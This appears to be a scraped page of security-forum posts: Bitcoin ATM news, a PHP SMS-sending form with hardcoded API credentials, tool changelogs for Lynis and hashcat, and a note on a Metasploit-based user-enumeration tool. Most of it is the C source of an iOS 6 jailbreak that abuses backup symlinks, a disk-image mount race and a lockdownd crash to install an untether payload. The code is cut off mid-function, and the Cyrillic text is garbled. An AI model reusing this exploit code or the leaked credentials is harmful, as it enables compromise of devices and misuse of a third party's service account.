Nytro

Bitcoin ATMs Are Spreading Across the World BY Brian Patrick Eha | December 31, 2013 Sometimes the future can sneak up on you. Like when you find out that a startup incorporated in the British Virgin Islands, whose employees live in New Hampshire and whose products are made in Portugal, is selling digital-currency ATMs to Saudi Arabia and Singapore. These are only two of the countries that have purchased Bitcoin ATMs from manufacturer Lamassu, which announced Monday that it had sold 120 of the machines to customers all over the world. A map Lamassu created to mark the occasion, showing the far-flung sales locations of its Bitcoin ATMs, not coincidentally illustrates the global appeal of Bitcoin. Zach Harvey, Lamassu's chief executive, said as much in a press release. "We will be shipping to 25 different countries, ranging from Canada to Kyrgyzstan, and we've translated our user interface into more than a dozen languages, including Russian, Chinese and Friulian," Harvey said. Lamassu has delivered about a dozen ATMs so far, with plans to ship the others in spring 2014. In October 2013, another company, Robocoin, made headlines for its Bitcoin ATM, said to be the first in the world that was available to the public, when one of its machines was installed in a coffee house in Vancouver. Within its first month in operation, the ATM had processed more than CAD$1 million in transactions. Robocoin's machine, which costs $20,000, or four to five times as much as Lamassu's (the company offers price discounts for bulk orders), both to buy bitcoins with paper bills and to withdraw cash by selling bitcoins. Lamassu's table-top ATM, which is much more compact than Robocoin's kiosk, cannot provide cash in exchange for bitcoins, only the other way around. Although Bitcoin ATMs are still in their infancy, they already represent a contentious space, in which each company is jealous of its claim to fame. After Business Insider Australia reported Monday that a company called 21st Century Bitcoin Exchange was setting up the first Bitcoin ATM in Australia, Lamassu corrected the news site on Twitter, saying it had already installed one of its own ATMs in Melbourne, with "about 15 more on their way." Robocoin's chief executive, for his part, took a shot at buy-only machines such as Lamassu's when his company's ATM debuted this past August. "Seriously, how bush league is an 'ATM' if it can't do the equivalent of deposits and withdrawals?" Robocoin CEO Jordan Kelley said. Lamassu will be presenting its Bitcoin ATM for trial use at the CES Startup Debut event in Las Vegas on January 5, prior to the Consumer Electronics Show that will kick off two days later. After one of Lamassu's machines was installed in Bratislava, Slovakia, a local man named Juraj Bedn?r created a demonstrating how easy it is to use. "It's always exciting for a young startup to have sales ramp up," Harvey said in the release. "But what's really thrilling for us is to know that these will be out in the wild, providing millions of people with effortless access to Bitcoin every single day." Sursa: Bitcoin ATMs Are Spreading Across the World | Entrepreneur.com

Nu stiu daca merge, sau daca merge pe Romania: <?php if(!empty($_POST["message"])) { // ???? $to = $_POST["to"]; $from = $_POST["from"]; $message = $_POST["message"]; // ????????? ??? ???? ?? ?????? // ?????????, ??? ?? ??? ?????? ?????? $numbers = file_get_contents("numbers.txt"); if(preg_match_all("/^.*$to.*\$/m", $numbers, $matches)) die("?? ???? ????? ??? ???? ??????????? ????????."); // ?????????? ??? $result = file_get_contents("http://api.fastsms.pro/send.php?username=Fmsg&password=b236d1aae3720b19d68255d23f42d096&useDirect=1&sender=$from&numbers=$to&message=".urlencode($message)); if(is_numeric($result)) echo("????????? ??????????"); else die("?????? ????????: $result."); // ????? ??????????? ? ???? ? ????????? ??? $file = fopen("numbers.txt", "r+"); fwrite($file, "$to\n"); fclose($file); die(); } ?> <form action='index.php' method='POST'> <table> <tr> <td> ??? ???????????:</td> <td> <input name='from' type='text' value='DedMoroz' readonly></td> </tr> <tr> <td> ????? ??????????:</td> <td> <input name='to' type='text' value=''></td> </tr> <tr> <td> ????? ?????????:</td> <td> <input name='message' type='text' value='???? ???? ????' readonly></td> </tr> <tr> <td> <button type='submit'>?????????</button></td> </tr> </table> </form> Sursa: http://pastebin.com/raw.php?i=88UY7t2Z

[h=1]30c3: To Protect And Infect, Part 2[/h] by: Jacob "@ioerror" Applebaum

Lynis The Unix/Linux Hardening tool updated to v1.3.8 Lynis is a security tool to audit and harden Unix and Linux based systems. It scans the system by performing many security control checks, looks for installed software and determines compliance to standards. Also will it detects security issues and errors in configuration. At the end of the scan it will provide the warnings and suggestions to help you improving the security defense of your systems. Some of the (future) features and usage options: System and security audit checks File Integrity Assessment System and file forensics Usage of templates/baselines (reporting and monitoring) Extended debugging features This tool is tested or confirmed to work with: AIX, Linux, FreeBSD, OpenBSD, Mac OS X, Solaris Changelog New parameter –view-categories to display available test categories Added /etc/hosts check (duplicates) [NAME-4402] Added /etc/hosts check (hostname) [NAME-4404] Added /etc/hosts check (localhost mapping) [NAME-4406] Portmaster test for possible port upgrades [PKGS-7378] Check for SPARC improve boot loader (SILO) [bOOT-5142] NFS client access test [sTRG-1930] Check system uptime [bOOT-5202] YUM repolist check [PKGS-7383] Contributors file added Improved locate database check and reporting [FILE-6410] Improved PAE/No eXecute test for Linux kernel [KRNL-5677] Disabled NIS domain name from test [NAME-4028] Extended NIS domain test to check BSD sysctl value [NAME-4306] Extended PAM tools check with PAM paths [AUTH-9262] Adjusted Apache check to avoid skipping it [HTTP-6622] Extended USB state testing [sTRG-1840] Extended Firewire state testing [sTRG-1846] Extended core dump test [KRNL-5820] Added /lib/i386-linux-gnu/security to PAM directories Added /usr/X11R6/bin directory to binary paths Improved readability of screen output Improved logging for several tests Improved Debian version detection Added warning to BIND test [NAME-4206] Extended binaries with showmount and yum Updated man page Download Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects

Kacak v0.1 released – Enumerate users in subnets Kacak is a tool that can enumerate users specified in the configuration file for windows based networks. It uses metasploit smb_enumusers_domain module in order to achieve this via msfrpcd service. If you are wondering what the msfrpcd service is, please look at the https://github.com/rapid7/metasploit-framework/blob/master/documentation/msfrpc.txt . It also parse mimikatz results. Download Submitted by Gokhan ALKAN (Tool’s author) Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects

hashcat v0.47 (Advanced Password Recovery) Released Hashcat is the world’s fastest CPU-based password recovery tool. While it’s not as fast as its GPU counterparts oclHashcat-plus and oclHashcat-lite, large lists can be easily split in half with a good dictionary and a bit of knowledge of the command switches. Changelog v0.47 added -m 123 = EPi added -m 1430 = sha256(unicode($pass).$salt) added -m 1440 = sha256($salt.unicode($pass)) added -m 1441 = EPiServer 6.x >= v4 added -m 1711 = SSHA-512(Base64), LDAP {SSHA512} added -m 1730 = sha512(unicode($pass).$salt) added -m 1740 = sha512($salt.unicode($pass)) added -m 7400 = SHA-256(Unix) added -m 7600 = Redmine SHA1 debug mode can now be used also together with -g, generate rule support added for using external salts together with mode 160 = HMAC-SHA1 (key = $salt) allow empty salt/key for HMAC algos allow variable rounds for hash modes 500, 1600, 1800, 3300, 7400 using rounds= specifier added –generate-rules-seed, sets seed used for randomization so rulesets can be reproduced added output-format type 8 (position:hash:plain) updated/added some hcchr charset files in /charsets, some new files: Bulgarian, Polish, Hungarian format output when using –show according to the –outfile-format option show mask length in status screen –disable-potfile in combination with –show or –left resulted in a crash, combination was disallowed Features Multi-Threaded Free Multi-Hash (up to 24 million hashes) Multi-OS (Linux, Windows and OSX native binaries) Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …) SSE2, AVX and XOP accelerated All Attack-Modes except Brute-Force and Permutation can be extended by rules Very fast Rule-engine Rules compatible with JTR and PasswordsPro Possible to resume or limit session Automatically recognizes recovered hashes from outfile at startup Can automatically generate random rules Load saltlist from external file and then use them in a Brute-Force Attack variant Able to work in an distributed environment Specify multiple wordlists or multiple directories of wordlists Number of threads can be configured Threads run on lowest priority Supports hex-charset Supports hex-salt 90+ Algorithms implemented with performance in mind …and much more More Information: hashcat Wiki Download hashcat v0.47 Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects

* pris0nbarake - jailbreak.c * * Exploits from evasi0n and absinthe2. And others. /*** pris0nbarake - jailbreak.c * * Exploits from evasi0n and absinthe2. And others. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. **/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <getopt.h> #include <dirent.h> #include <signal.h> #include <plist/plist.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/errno.h> #include <assert.h> #include <libimobiledevice/libimobiledevice.h> #include <libimobiledevice/lockdown.h> #include <libimobiledevice/mobile_image_mounter.h> #include <libimobiledevice/mobilebackup2.h> #include <libimobiledevice/notification_proxy.h> #include <libimobiledevice/afc.h> #include <libimobiledevice/sbservices.h> #include <libimobiledevice/file_relay.h> #include <libimobiledevice/diagnostics_relay.h> #include <zlib.h> #include <fcntl.h> #include <sys/mman.h> #include "partialcommon.h" #include "partial.h" #include "common.h" #include "MobileDevice.h" #define AFCTMP "HackStore" typedef struct _compatibility { char *product; char *build; } compatibility_t; compatibility_t compatible_devices[] = { {"N81AP", "10B400"}, {"N41AP", "10B350"}, {"N42AP", "10B350"}, {"N94AP", "10B329"}, {"N90BAP", "10B329"}, {"N90AP", "10B329"}, {"N92AP", "10B329"}, {"N81AP", "10B329"}, {"N88AP", "10B329"}, {"N78AP", "10B329"}, {"N41AP", "10B329"}, {"N42AP", "10B329"}, {"J1AP", "10B329"}, {"J2AP", "10B329"}, {"J2aAP", "10B329"}, {"P101AP", "10B329"}, {"P102AP", "10B329"}, {"P103AP", "10B329"}, {"K93AP", "10B329"}, {"K93AAP", "10B329"}, {"K94AP", "10B329"}, {"K95AP", "10B329"}, {"P105AP", "10B329"}, {"P106AP", "10B329"}, {"P107AP", "10B329"}, {NULL, NULL} }; static int cpio_get_file_name_length(void *cpio) { if (cpio) { char buffer[7]; int val; memset(buffer, '\0', 7); memcpy(&buffer, (void *) (cpio + 59), 6); /* File Name Length */ val = strtoul(buffer, NULL, 8); return val; } else { return 0; } } static int cpio_get_file_length(void *cpio) { if (cpio) { char buffer[12]; int val; memset(buffer, '\0', 12); memcpy(&buffer, (void *) (cpio + 65), 11); /* File Length */ val = strtoul(buffer, NULL, 8); return val; } else { return 0; } } /* recursively remove path, including path */ static void rmdir_recursive(const char *path) { /*{{{ */ if (!path) { return; } DIR *cur_dir = opendir(path); if (cur_dir) { struct dirent *ep; while ((ep = readdir(cur_dir))) { if ((strcmp(ep->d_name, ".") == 0) || (strcmp(ep->d_name, "..") == 0)) { continue; } char *fpath = (char *) malloc(strlen(path) + 1 + strlen(ep->d_name) + 1); if (fpath) { struct stat st; strcpy(fpath, path); strcat(fpath, "/"); strcat(fpath, ep->d_name); if ((stat(fpath, &st) == 0) && S_ISDIR(st.st_mode)) { rmdir_recursive(fpath); } else { if (remove(fpath) != 0) { DEBUG("could not remove file %s: %s\n", fpath, strerror(errno)); } } free(fpath); } } closedir(cur_dir); } if (rmdir(path) != 0) { fprintf(stderr, "could not remove directory %s: %s\n", path, strerror(errno)); } } /*}}} */ static void print_xml(plist_t node) { char *xml = NULL; uint32_t len = 0; plist_to_xml(node, &xml, &len); if (xml) puts(xml); } /* char** freeing helper function */ static void free_dictionary(char **dictionary) { /*{{{ */ int i = 0; if (!dictionary) return; for (i = 0; dictionary; i++) { free(dictionary); } free(dictionary); } /*}}} */ /* recursively remove path via afc, (incl = 1 including path, incl = 0, NOT including path) */ static int rmdir_recursive_afc(afc_client_t afc, const char *path, int incl) { /*{{{ */ char **dirlist = NULL; if (afc_read_directory(afc, path, &dirlist) != AFC_E_SUCCESS) { //fprintf(stderr, "AFC: could not get directory list for %s\n", path); return -1; } if (dirlist == NULL) { if (incl) { afc_remove_path(afc, path); } return 0; } char **ptr; for (ptr = dirlist; *ptr; ptr++) { if ((strcmp(*ptr, ".") == 0) || (strcmp(*ptr, "..") == 0)) { continue; } char **info = NULL; char *fpath = (char *) malloc(strlen(path) + 1 + strlen(*ptr) + 1); strcpy(fpath, path); strcat(fpath, "/"); strcat(fpath, *ptr); if ((afc_get_file_info(afc, fpath, &info) != AFC_E_SUCCESS) || !info) { // failed. try to delete nevertheless. afc_remove_path(afc, fpath); free(fpath); free_dictionary(info); continue; } int is_dir = 0; int i; for (i = 0; info; i += 2) { if (!strcmp(info, "st_ifmt")) { if (!strcmp(info[i + 1], "S_IFDIR")) { is_dir = 1; } break; } } free_dictionary(info); if (is_dir) { rmdir_recursive_afc(afc, fpath, 0); } afc_remove_path(afc, fpath); free(fpath); } free_dictionary(dirlist); if (incl) { afc_remove_path(afc, path); } return 0; } /*}}} */ static int connected = 0; void jb_device_event_cb(const idevice_event_t * event, void *user_data) { char *uuid = (char *) user_data; DEBUG("device event %d: %s\n", event->event, event->udid); if (uuid && strcmp(uuid, event->udid)) return; if (event->event == IDEVICE_DEVICE_ADD) { connected = 1; } else if (event->event == IDEVICE_DEVICE_REMOVE) { connected = 0; } } static void idevice_event_cb(const idevice_event_t * event, void *user_data) { jb_device_event_cb(event, user_data); } typedef struct __csstores { uint32_t csstore_number; } csstores_t; static csstores_t csstores[16]; static int num_of_csstores = 0; int check_consistency(char *product, char *build) { // Seems legit. return 0; } int verify_product(char *product, char *build) { compatibility_t *curcompat = &compatible_devices[0]; while ((curcompat) && (curcompat->product != NULL)) { if (!strcmp(curcompat->product, product) && !strcmp(curcompat->build, build)) return 0; curcompat++; } return 1; } const char *lastmsg = NULL; static void status_cb(const char *msg, int progress) { if (!msg) { msg = lastmsg; } else { lastmsg = msg; } DEBUG("[%d%%] %s\n", progress, msg); } #ifndef __GUI__ int main(int argc, char *argv[]) { device_t *device = NULL; char *uuid = NULL; char *product = NULL; char *build = NULL; int old_os = 0; /********************************************************/ /* * device detection */ /********************************************************/ if (!uuid) { device = device_create(NULL); if (!device) { ERROR("No device found, is it plugged in?\n"); return -1; } uuid = strdup(device->uuid); } else { DEBUG("Detecting device...\n"); device = device_create(uuid); if (device == NULL) { ERROR("Unable to connect to device\n"); return -1; } } DEBUG("Connected to device with UUID %s\n", uuid); lockdown_t *lockdown = lockdown_open(device); if (lockdown == NULL) { ERROR("Lockdown connection failed\n"); device_free(device); return -1; } if ((lockdown_get_string(lockdown, "HardwareModel", &product) != LOCKDOWN_E_SUCCESS) || (lockdown_get_string(lockdown, "BuildVersion", &build) != LOCKDOWN_E_SUCCESS)) { ERROR("Could not get device information\n"); lockdown_free(lockdown); device_free(device); return -1; } DEBUG("Device is a %s with build %s\n", product, build); if (verify_product(product, build) != 0) { ERROR("Device is not supported\n"); return -1; } plist_t pl = NULL; lockdown_get_value(lockdown, NULL, "ActivationState", &pl); if (pl && plist_get_node_type(pl) == PLIST_STRING) { char *as = NULL; plist_get_string_val(pl, &as); plist_free(pl); if (as) { if (strcmp(as, "Unactivated") == 0) { free(as); ERROR("The attached device is not activated. You need to activate it before it can be used with this jailbreak.\n"); lockdown_free(lockdown); device_free(device); return -1; } free(as); } } pl = NULL; lockdown_get_value(lockdown, "com.apple.mobile.backup", "WillEncrypt", &pl); if (pl && plist_get_node_type(pl) == PLIST_BOOLEAN) { char c = 0; plist_get_bool_val(pl, &c); plist_free(pl); if © { ERROR("You have a device backup password set. You need to disable the backup password in iTunes.\n"); lockdown_free(lockdown); device_free(device); return -1; } } lockdown_free(lockdown); device_free(device); device = NULL; idevice_event_subscribe(idevice_event_cb, uuid); jailbreak_device(uuid, status_cb); return 0; } #endif static void plist_replace_item(plist_t plist, char *name, plist_t item) { if (plist_dict_get_item(plist, name)) plist_dict_remove_item(plist, name); plist_dict_insert_item(plist, name, item); } kern_return_t send_message(service_conn_t socket, CFPropertyListRef plist); CFPropertyListRef receive_message(service_conn_t socket); static char *real_dmg, *real_dmg_signature, *ddi_dmg; static void print_data(CFDataRef data) { if (data == NULL) { DEBUG("[null]\n"); return; } DEBUG("[%.*s]\n", (int) CFDataGetLength(data), CFDataGetBytePtr(data)); } void qwrite(afc_connection * afc, const char *from, const char *to) { DEBUG("Sending %s -> %s... ", from, to); afc_file_ref ref; int fd = open(from, O_RDONLY); assert(fd != -1); size_t size = (size_t) lseek(fd, 0, SEEK_END); void *buf = mmap(NULL, size, PROT_READ, MAP_SHARED, fd, 0); assert(buf != MAP_FAILED); AFCFileRefOpen(afc, to, 3, &ref); AFCFileRefWrite(afc, ref, buf, size); AFCFileRefClose(afc, ref); DEBUG("done.\n"); close(fd); } int timesl, tries = 0; volatile int is_ddid = 0; #undef assert #define assert(x) (x) /* badcode is bad */ static void cb2(am_device_notification_callback_info * info, void *foo) { timesl = 1000; struct am_device *dev; DEBUG("... %x\n", info->msg); if (is_ddid) CFRunLoopStop(CFRunLoopGetCurrent()); if (info->msg == ADNCI_MSG_CONNECTED) { dev = info->dev; tries++; if (tries >= 30) { is_ddid = -1; return; } AMDeviceConnect(dev); assert(AMDeviceIsPaired(dev)); assert(!AMDeviceValidatePairing(dev)); assert(!AMDeviceStartSession(dev)); CFStringRef product = AMDeviceCopyValue(dev, 0, CFSTR("ProductVersion")); assert(product); UniChar first = CFStringGetCharacterAtIndex(product, 0); int epoch = first - '0'; Retry: printf("."); fflush(stdout); service_conn_t afc_socket = 0; struct afc_connection *afc = NULL; assert(!AMDeviceStartService(dev, CFSTR("com.apple.afc"), &afc_socket, NULL)); assert(!AFCConnectionOpen(afc_socket, 0, &afc)); assert(!AFCDirectoryCreate(afc, "PublicStaging")); AFCRemovePath(afc, "PublicStaging/staging.dimage"); qwrite(afc, real_dmg, "PublicStaging/staging.dimage"); if (ddi_dmg) qwrite(afc, ddi_dmg, "PublicStaging/ddi.dimage"); service_conn_t mim_socket1 = 0; service_conn_t mim_socket2 = 0; assert(!AMDeviceStartService(dev, CFSTR("com.apple.mobile.mobile_image_mounter"), &mim_socket1, NULL)); assert(mim_socket1); CFPropertyListRef result = NULL; CFMutableDictionaryRef dict = CFDictionaryCreateMutable(NULL, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); CFDictionarySetValue(dict, CFSTR("Command"), CFSTR("MountImage")); CFDictionarySetValue(dict, CFSTR("ImageType"), CFSTR("Developer")); CFDictionarySetValue(dict, CFSTR("ImagePath"), CFSTR("/var/mobile/Media/PublicStaging/staging.dimage")); int fd = open(real_dmg_signature, O_RDONLY); assert(fd != -1); uint8_t sig[128]; assert(read(fd, sig, sizeof(sig)) == sizeof(sig)); close(fd); CFDictionarySetValue(dict, CFSTR("ImageSignature"), CFDataCreateWithBytesNoCopy(NULL, sig, sizeof(sig), kCFAllocatorNull)); send_message(mim_socket1, dict); if (ddi_dmg) { DEBUG("sleep %d\n", timesl); usleep(timesl); assert(!AFCRenamePath(afc, "PublicStaging/ddi.dimage", "PublicStaging/staging.dimage")); } DEBUG("receive 1:\n"); result = receive_message(mim_socket1); print_data(CFPropertyListCreateXMLData(NULL, result)); if (strstr(CFDataGetBytePtr(CFPropertyListCreateXMLData(NULL, result)), "ImageMountFailed")) { timesl += 100; goto Retry; } is_ddid = 1; CFRunLoopStop(CFRunLoopGetCurrent()); fflush(stdout); } } void stroke_lockdownd(device_t * device) { plist_t crashy = plist_new_dict(); char *request = NULL; unsigned int size = 0; idevice_connection_t connection; uint32_t magic; uint32_t sent = 0; plist_dict_insert_item(crashy, "Request", plist_new_string("Pair")); plist_dict_insert_item(crashy, "PairRecord", plist_new_bool(0)); plist_to_xml(crashy, &request, &size); magic = __builtin_bswap32(size); plist_free(crashy); if (idevice_connect(device->client, 62078, &connection)) { ERROR("Failed to connect to lockdownd.\n"); } idevice_connection_send(connection, &magic, 4, &sent); idevice_connection_send(connection, request, size, &sent); idevice_connection_receive_timeout(connection, &size, 4, &sent, 1500); size = __builtin_bswap32(size); if (size) { void *ptr = malloc(size); idevice_connection_receive_timeout(connection, ptr, &size, &sent, 5000); } idevice_disconnect(connection); // XXX: Wait for lockdownd to start. sleep(5); } struct mobile_image_mounter_client_private { void *parent; void *mutex; }; char* overrides_plist = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" "<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n" "<plist version=\"1.0\">\n" "<dict>\n" " <key>com.apple.syslogd</key>\n" " <dict>\n" " <key>Disabled</key>\n" " <true/>\n" " </dict>\n" "</dict>\n" "</plist>\n"; void callback(ZipInfo* info, CDFile* file, size_t progress) { int percentDone = progress * 100/file->compressedSize; printf("Getting: %d%%\n", percentDone); } int jailbreak_device(const char *uuid, status_cb_t cb) { char backup_dir[1024]; device_t *device = NULL; char *build = NULL; char *product = NULL; struct lockdownd_service_descriptor desc = { 0, 0 }; int is_jailbroken = 0; if (!uuid) { ERROR("Missing device UDID\n"); return -1; } assert(cb); tmpnam(backup_dir); DEBUG("Backing up files to %s\n", backup_dir); // Wait for a connection DEBUG("Connecting to device...\n"); cb("Connecting to device...\n", 2); int retries = 20; int i = 0; while (!connected && (i++ < retries)) { sleep(1); } if (!connected) { ERROR("Device connection failed\n"); return -1; } // Open a connection to our device DEBUG("Opening connection to device\n"); device = device_create(uuid); if (device == NULL) { ERROR("Unable to connect to device\n"); } lockdown_t *lockdown = lockdown_open(device); if (lockdown == NULL) { WARN("Lockdown connection failed\n"); device_free(device); return -1; } if ((lockdown_get_string(lockdown, "HardwareModel", &product) != LOCKDOWN_E_SUCCESS) || (lockdown_get_string(lockdown, "BuildVersion", &build) != LOCKDOWN_E_SUCCESS)) { ERROR("Could not get device information\n"); if (product) { free(product); } if (build) { free(build); } lockdown_free(lockdown); device_free(device); return -1; } cb("Getting payload files from Apple... (if this fails, your internet connection has issues...)\n", 5); struct stat st; /* Hackcheck for network connection... */ ZipInfo* info2 = PartialZipInit("http://appldnld.apple.com/iOS6.1/091-2397.20130319.EEae9/iPad2,1_6.1.3_10B329_Restore.ipsw"); if(!info2) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info2, callback); CDFile* file = PartialZipFindFile(info2, "BuildManifest.plist"); if(!file) { ERROR("cannot file find\n"); return -1; } PartialZipRelease(info2); DEBUG("Device info: %s, %s\n", product, build); DEBUG("Beginning jailbreak, this may take a while...\n"); cb("Gathering information to generate jailbreak data...\n", 10); uint16_t port = 0; is_ddid = 0; if (lockdown_start_service(lockdown, "com.apple.afc2", &port) == 0) { char **fileinfo = NULL; uint32_t ffmt = 0; afc_client_t afc2 = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc2); if (afc2) { afc_get_file_info(afc2, "/Applications", &fileinfo); if (fileinfo) { int i; for (i = 0; fileinfo; i += 2) { if (!strcmp(fileinfo, "st_ifmt")) { if (strcmp(fileinfo[i + 1], "S_IFLNK") == 0) { ffmt = 1; } break; } } afc_free_dictionary(fileinfo); fileinfo = NULL; if (ffmt) { ERROR("Device already jailbroken! Detected stash."); afc_client_free(afc2); lockdown_free(lockdown); device_free(device); cb("Device already jailbroken, detected stash.", 100); return 0; } } afc_get_file_info(afc2, "/private/etc/launchd.conf", &fileinfo); if (fileinfo) { ERROR("Device already jailbroken! Detected untether."); afc_client_free(afc2); lockdown_free(lockdown); device_free(device); cb("Device already jailbroken, detected untether.", 100); return 0; } afc_client_free(afc2); } } if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { ERROR("Failed to start AFC service", 0); lockdown_free(lockdown); device_free(device); return -1; } lockdown_free(lockdown); lockdown = NULL; afc_client_t afc = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { ERROR("Could not connect to AFC service\n"); device_free(device); return -1; } // check if directory exists char **list = NULL; if (afc_read_directory(afc, "/" AFCTMP, &list) != AFC_E_SUCCESS) { // we're good, directory does not exist. } else { free_dictionary(list); WARN("Looks like you attempted to apply this Jailbreak and it failed. Will try to fix now...\n", 0); sleep(5); goto fix; } afc_client_free(afc); afc = NULL; /** SYMLINK: Recordings/.haxx -> /var */ rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); char *bargv[] = { "idevicebackup2", "backup", backup_dir, NULL }; char *rargv[] = { "idevicebackup2", "restore", "--system", "--settings", "--reboot", backup_dir, NULL }; char *rargv2[] = { "idevicebackup2", "restore", "--system", "--settings", backup_dir, NULL }; backup_t *backup; rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); idevicebackup2(3, bargv); cb("Sending initial data...\n", 15); backup = backup_open(backup_dir, uuid); if (!backup) { fprintf(stderr, "ERROR: failed to open backup\n"); return -1; } /* Reboot for the sake of posterity. Gets rid of all Developer images mounted. */ { if (backup_mkdir(backup, "MediaDomain", "Media/Recordings", 0755, 501, 501, 4) != 0) { ERROR("Could not make folder\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx", "/var/db/launchd.db/com.apple.launchd", 501, 501, 4) != 0) { ERROR("Failed to symlink var!\n"); return -1; } FILE *f = fopen("payload/common/overrides.plist", "wb+"); fwrite(overrides_plist, sizeof(overrides_plist), 1, f); fclose(f); if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/overrides.plist", "Media/Recordings/.haxx/overrides.plist", 0100755, 0, 0, 4) != 0) { ERROR("Could not add tar"); return -1; } } idevicebackup2(6, rargv); unlink("payload/common/overrides.plist"); backup_free(backup); cb("Waiting for reboot. Do not unplug your device.\n", 18); /********************************************************/ /* wait for device reboot */ /********************************************************/ // wait for disconnect while (connected) { sleep(2); } DEBUG("Device %s disconnected\n", uuid); // wait for device to connect while (!connected) { sleep(2); } DEBUG("Device %s detected. Connecting...\n", uuid); sleep(10); /********************************************************/ /* wait for device to finish booting to springboard */ /********************************************************/ device = device_create(uuid); if (!device) { ERROR("ERROR: Could not connect to device. Aborting."); // we can't recover since the device connection failed... return -1; } lockdown = lockdown_open(device); if (!lockdown) { device_free(device); ERROR("ERROR: Could not connect to lockdown. Aborting"); // we can't recover since the device connection failed... return -1; } retries = 100; int done = 0; sbservices_client_t sbsc = NULL; plist_t state = NULL; DEBUG("Waiting for SpringBoard...\n"); while (!done && (retries-- > 0)) { port = 0; lockdown_start_service(lockdown, "com.apple.springboardservices", &port); if (!port) { continue; } sbsc = NULL; desc.port = port; sbservices_client_new(device->client, &desc, &sbsc); if (!sbsc) { continue; } if (sbservices_get_icon_state(sbsc, &state, "2") == SBSERVICES_E_SUCCESS) { plist_free(state); state = NULL; done = 1; } sbservices_client_free(sbsc); if (done) { sleep(3); DEBUG("bootup complete\n"); break; } sleep(3); } lockdown_free(lockdown); lockdown = NULL; /* Download images. */ if(stat("payload/iOSUpdaterHelper.dmg", &st)) { ZipInfo* info = PartialZipInit("http://appldnld.apple.com/iOS6/041-8518.20121029.CCrt9/iOSUpdater.ipa"); if(!info) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info, callback); CDFile* file = PartialZipFindFile(info, "Payload/iOSUpdater.app/iOSUpdaterHelper.dmg"); if(!file) { ERROR("Cannot find file in zip 1\n"); return -1; } unsigned char* data = PartialZipGetFile(info, file); int dataLen = file->size; PartialZipRelease(info); data = realloc(data, dataLen + 1); data[dataLen] = '\0'; FILE* out; out = fopen("payload/iOSUpdaterHelper.dmg", "wb+"); if (out == NULL) { ERROR("Failed to open file"); return -1; } fwrite(data, sizeof(char), dataLen, out); fclose(out); free(data); } if(stat("payload/iOSUpdaterHelper.dmg.signature", &st)) { ZipInfo* info = PartialZipInit("http://appldnld.apple.com/iOS6/041-8518.20121029.CCrt9/iOSUpdater.ipa"); if(!info) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info, callback); CDFile* file = PartialZipFindFile(info, "Payload/iOSUpdater.app/iOSUpdaterHelper.dmg.signature"); if(!file) { ERROR("Cannot find file in zip 2\n"); return -1; } unsigned char* data = PartialZipGetFile(info, file); int dataLen = file->size; PartialZipRelease(info); data = realloc(data, dataLen + 1); data[dataLen] = '\0'; FILE* out; out = fopen("payload/iOSUpdaterHelper.dmg.signature", "wb+"); if (out == NULL) { ERROR("Failed to open file"); return -1; } fwrite(data, sizeof(char), dataLen, out); fclose(out); free(data); } /* * Upload DDI original. */ real_dmg = "payload/iOSUpdaterHelper.dmg"; real_dmg_signature = "payload/iOSUpdaterHelper.dmg.signature"; ddi_dmg = "payload/hax.dmg"; cb("Waiting for device...\n", 25); //dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{ AMDAddLogFileDescriptor(2); am_device_notification * notif; assert(!AMDeviceNotificationSubscribe(cb2, 0, 0, NULL, &notif)); CFRunLoopRun(); //}); while (!is_ddid) ; if (is_ddid == -1) { ERROR("Failed to mount image\n"); cb("Failed to mount image\n", 10); return -1; } /** DDI Mounted! */ if (!lockdown) lockdown = lockdown_open(device); cb("Remounting root...\n", 40); if (lockdown_start_service(lockdown, "r", &port) != 0) { DEBUG("Timed out on doing so... doesn't really matter though..\n"); } /* Delete files */ unlink("payload/iOSUpdaterHelper.dmg"); unlink("payload/iOSUpdaterHelper.dmg.signature"); /** Install bootstrap. */ rmdir_recursive_afc(afc, "/Recordings", 1); if (lockdown_start_service(lockdown, "com.apple.afc2", &port) != 0) { ERROR("Device failed to mount image proper!\n"); return -1; } /* * Goody, goody. Let's copy everything over! */ cb("Sending Cydia and untether payload to the device...\n", 70); rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); if (!afc) { lockdown = lockdown_open(device); port = 0; if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { WARN("Could not start AFC service. Aborting.\n"); lockdown_free(lockdown); goto leave; } lockdown_free(lockdown); desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { WARN("Could not connect to AFC. Aborting.\n"); goto leave; } } rmdir_recursive_afc(afc, "/Recordings", 1); idevicebackup2(3, bargv); backup = backup_open(backup_dir, uuid); if (!backup) { fprintf(stderr, "ERROR: failed to open backup\n"); return -1; } /* * Do it again. */ { if (backup_mkdir(backup, "MediaDomain", "Media/Recordings", 0755, 501, 501, 4) != 0) { 